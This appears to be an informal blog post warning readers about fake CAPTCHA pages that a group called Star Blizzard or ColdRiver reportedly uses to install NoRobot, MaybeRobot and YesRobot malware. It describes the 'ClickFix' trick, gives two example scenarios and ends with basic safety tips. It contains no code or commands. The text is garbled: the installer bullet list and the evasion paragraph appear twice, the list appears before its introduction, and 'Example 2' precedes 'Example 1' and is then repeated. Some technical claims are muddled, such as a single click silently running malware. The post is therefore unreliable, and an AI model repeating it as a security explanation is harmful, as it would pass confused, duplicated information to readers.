Hey — have you heard that hackers have a trick now to hide malware behind a fake “I am not a robot” CAPTCHA page? This Russian group (usually called Star Blizzard or ColdRiver depending on which cybersecurity provider you read) is pushing families of malware called NoRobot, MaybeRobot, and YesRobot. Basically, the attacker presents a fake CAPTCHA on a website, you click it, and the malware runs.
• Run automatically on startup,
• Download additional malware, and
• Allow the hackers to take remote control of your computer or steal your data.
The group continues to alter the code and split files to evade detection. They combine NoRobot, MaybeRobot, and YesRobot so that security tools are unable to recognize a pattern.
Example 2 - Job board scam: You have applied for a job on a job board and a site says “prove you’re human.” The click registration has been built into the CAPTCHA, and when you click it, a small script is run that reads silently in your documents folder and sends back the names of documents that were obvious to the attacker.
A Quick Story (Yes, This is a Real One)
A friend of mine once told me that they clicked on a CAPTCHA on a website that seemed normal. Shortly after clicking the CAPTCHA, their laptop slowed dramatically and a weird program began trying to send files out. We cleaned up the machine, changed the passwords, and learned the hard way that it probably is good practice to avoid suspicious CAPTCHAs altogether. It wasn’t worth the time or stress for a small mouse click.How This Attack is Done (Simple Steps)
Hackers use a technique known as ClickFix. They will take you to a fake CAPTCHA page that appears to be a legitimate human check. Once you click it, it drops a very small installer. This installer can:• Run automatically on startup,
• Download additional malware, and
• Allow the hackers to take remote control of your computer or steal your data.
The group continues to alter the code and split files to evade detection. They combine NoRobot, MaybeRobot, and YesRobot so that security tools are unable to recognize a pattern.
Two Real-Life Examples Likely to Encounter
Example 1 - Fake download site: You are browsing a free fonts site when all of a sudden you get the font. Upon clicking, the page has a CAPTCHA. When you complete the CAPTCHA, a screen pops up with a downloaded file labeled “font-installer.exe.” It appears to be normal, but when you run the file, it runs a payload behind the scenes to steal any saved passwords on your browser.Example 2 - Job board scam: You have applied for a job on a job board and a site says “prove you’re human.” The click registration has been built into the CAPTCHA, and when you click it, a small script is run that reads silently in your documents folder and sends back the names of documents that were obvious to the attacker.
Basic Steps to Protect Yourself
- Don't perform CAPTCHAs on unfamiliar or sketchy sites. If you see something that seems off, leave.
- Stay up to date and run a reputable antivirus that checks your downloads and scripts.
- If you suspect an infection, use good backups and change your passwords. Also consider doing a full scan and a restore.